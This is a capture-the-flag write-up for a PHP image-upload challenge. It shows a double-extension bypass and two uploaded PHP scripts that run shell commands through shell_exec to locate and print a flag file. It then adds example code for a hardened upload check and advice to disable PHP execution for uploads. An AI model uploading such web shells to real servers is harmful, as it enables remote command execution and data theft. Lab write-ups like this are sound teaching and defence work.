uphpload

Description

Chall desc

Solution

The webpage allows us to upload images and view them. This immediately suggests a file upload vulnerability.

The page only accepts image files. This can be bypassed using a double extension.

Upload a PHP script that searches for the flag.txt file:

<?php
    print shell_exec('find / -name "flag.txt"');
?>

Click on the file in uploads to run the script. This gives us the flag location.

Now upload a script to print the flag:

<?php
    print shell_exec('cat /flag_is_here/flag.txt');
?>
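
For the defending side, the double-extension bypass above comes down to how the upload handler decides what counts as an image. The following is an added example, not the challenge's source code: `weak_is_image` is an assumed form of the check that a double extension gets past, and `safe_stored_name` is a hardened counterpart. The function names, the sample file names and the use of PHP's fileinfo extension are assumptions.

```php
<?php
// Added example: hypothetical upload checks, not the challenge's source code.
const ALLOWED = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

// Assumed weak check: an image extension anywhere in the name is enough.
function weak_is_image(string $name): bool
{
    return preg_match('/\.(jpg|png|gif)/i', $name) === 1;
}

// Hardened check: only the final extension counts, the bytes must match the
// type that extension claims, and the stored name is generated server-side.
function safe_stored_name(string $clientName, string $bytes): ?string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        return null;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if ($mime !== ALLOWED[$ext]) {
        return null;
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs: a 1x1 PNG and a short PHP script body.
$png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');
$php = "<?php echo 'hello'; ?>";
$samples = [
    ['photo.png', $png],      // genuine image
    ['script.png.php', $php], // double extension
    ['script.png', $php],     // image name, non-image bytes
];

foreach ($samples as [$name, $bytes]) {
    $weak = weak_is_image($name) ? 'accept' : 'reject';
    $stored = safe_stored_name($name, $bytes);
    printf("%-16s weak=%s hardened=%s\n", $name, $weak, $stored ?? 'reject');
}
```

Refusing the upload is one layer. The step where clicking the file runs it also depends on the uploads directory being served with PHP execution enabled, which should be turned off for user content.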
